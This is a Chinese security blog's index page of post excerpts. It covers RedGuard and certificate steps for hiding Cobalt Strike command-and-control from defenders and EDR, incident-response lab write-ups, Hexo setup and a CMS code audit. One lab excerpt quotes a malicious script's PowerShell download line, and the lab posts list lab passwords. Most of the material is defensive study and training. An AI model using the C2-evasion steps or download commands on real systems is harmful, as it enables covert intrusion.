RedGuard的使用方法
2024-12-12🌱湖州: ☁️ 🌡️+9°C 🌬️←8km/h 项目地址https://github.com/wikiZ/RedGuard教程参考地址:https://github.com/wikiZ/RedGuard/blob/main/doc/README_CN.md 下载安装我是直接下载好编译好的版本,然后赋予执行权限 1chmod +x ./RedGuard&&./RedGuard 初次运行会生成配置文件,在如下的目录 /root/.RedGuard_CobaltStrike.ini 工具作用避免Blue Team,AVS,EDR,Cyberspace Search Engine的检查 使用方法使用自定义的证书 首先修改配置文件中的证书信息nano...
cobaltstrike隐藏
2024-11-13🌱湖州: ⛅️ 🌡️+20°C 🌬️↖19km/h 修改证书参考链接:https://blog.csdn.net/weixin_42282667/article/details/123356104 下载配置cloudflare的证书 访问如下网站https://dash.cloudflare.com/ 选择自己的域名,然后点击配置 将加密方式修改成full 创建证书 创建一个新的证书 点击创建 将生成的证书和私钥储存好 生成store格式的证书对 将上面保存的证书储存到cloudflare.pem文件中 将私钥保存到cloudflare.key中 生成keystore文件 使用openssl将pem证书和key私钥导出为P12格式的证书 123openssl pkcs12 -export -in pem证书 -inkey key私钥 -out p12文件 -name 域名 -passout pass:密码openssl pkcs12 -export -in cloudflare.pem -inkey...
应急响应靶机-挖矿
2024-11-08🌱湖州: ☁️ 🌡️+17°C 🌬️↓5km/h 靶场来源https://agonysec.github.io/post/emergency-response-target-machine-trainingmining-fgqqu.html 挑战题解: 攻击者的IP地址 攻击者开始攻击的时间 攻击者攻击的端口 挖矿程序的md5 后门脚本的md5 矿池地址 钱包地址 攻击者是如何攻击进入的 相关账户密码: Administrator/zgsf@123 查看最近的文件 win+r输入recent 发现这个AppDate目录和这个systems.bat.txt比较可疑 打开AppData目录 发现bat文件 查看systems.bat文件 1powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile +=...
应急响应靶机-近源渗透OS1
2024-11-01🌱湖州: ☁️ 🌡️+17°C 🌬️↘27km/h 靶机来源https://mp.weixin.qq.com/s/bVlctiSGmRkmRBaUVibwUg 前景需要:小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。 1.攻击者的外网IP地址 2.攻击者的内网跳板IP地址 3.攻击者使用的限速软件的md5大写 4.攻击者的后门md5大写 5.攻击者留下的flag 相关账户密码 ...
应急响应靶机-Web2
2024-10-31🌱湖州: 🌦 🌡️+18°C 🌬️↙14km/h 靶场来源https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247485230&idx=1&sn=7a6ff6376caf2a2268a468e78901b6d0&chksm=c11a56d3f66ddfc505fa9faf68077bb4679e31919b8cfefe505e8a93a0bcd086f44904e7530f&scene=178&cur_album_id=3245764910756954116#rd 挑战内容 前景需要:小李在某单位驻场值守,深夜12点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。 这是他的服务器系统,请你找出以下内容,并作为通关条件: 1.攻击者的IP地址(两个)? 2.攻击者的webshell文件名? 3.攻击者的webshell密码? ...
应急响应靶机-Linux(2)-实战
2024-10-30🌱湖州: ⛅️ 🌡️+18°C...
应急响应靶机-Web1实战
2024-10-28🌱湖州: ☀️ 🌡️+16°C...
应急响应靶机-Linux(1)-实战
2024-10-28🌱湖州: 🌦 🌡️+17°C 🌬️↓13km/h 靶场来源https://mp.weixin.qq.com/s/gCWGnBiwbqSnafXU1apJCA 账户密码是defend 挑战内容前景需要:小王急匆匆地找到小张,小王说”李哥,我dev服务器被黑了”,快救救我!! 挑战内容: 黑客的IP地址 遗留下的三个flag 其他详细的信息,在以上的链接中均已提及,本文仅通过实验来验证巩固自己的应急响应知识 基础信息检查 拿到这个环境后,先进行一些常规命令检查和一些常见文件的检查 查看系统历史命令 正常来说攻击者为了隐藏踪迹一般都会清除历史命令,但是以防万一还是查看下 12345先是普通用户的历史命令history然后进入到root用户,查看历史命令 结果发现第一个flag在root用户的历史命令中就出来了flag{thisismybaby} 查看是否有可疑用户12cat /etc/passwdcat...
Linux搭建Hexo博客
2024-10-27🌱湖州: 🌦 🌡️+16°C 🌬️↓12km/h 更新源添加源,终端输入:sudo vim /etc/apt/sources.list 下列源选择部分添加: 官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib中科大源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 阿里云源deb http://mirrors.aliyun.com/kali kali-rolling main non-free...
jspxcms代码审计
2024-10-24🌱湖州: ☀️ 🌡️+20°C 🌬️↙11km/h 废话不多说,直接开始审计参考: https://www.cnblogs.com/yokan/p/16248509.html https://0xf4n9x.github.io/jspxcms-code-audit-learn.html 源码地址https://www.ujcms.com/uploads/jspxcms-9.5.0-release-src.zip 部署java8+mysql5.7.26 这里直接使用phpstudy部署mysql环境,然后启动 然后执行sql命令123create database jspxcms_testuse jspxcms_testsource mysql.sql 我这里使用DataGrip连接数据库,然后执行database目录下的sql文件 配置idea在application.properties中设置数据库的名称、密码等等 然后配置运行文件jdk8,项目结构中语言等级选择8 然后直接运行即可 技术栈 SpringMVC...










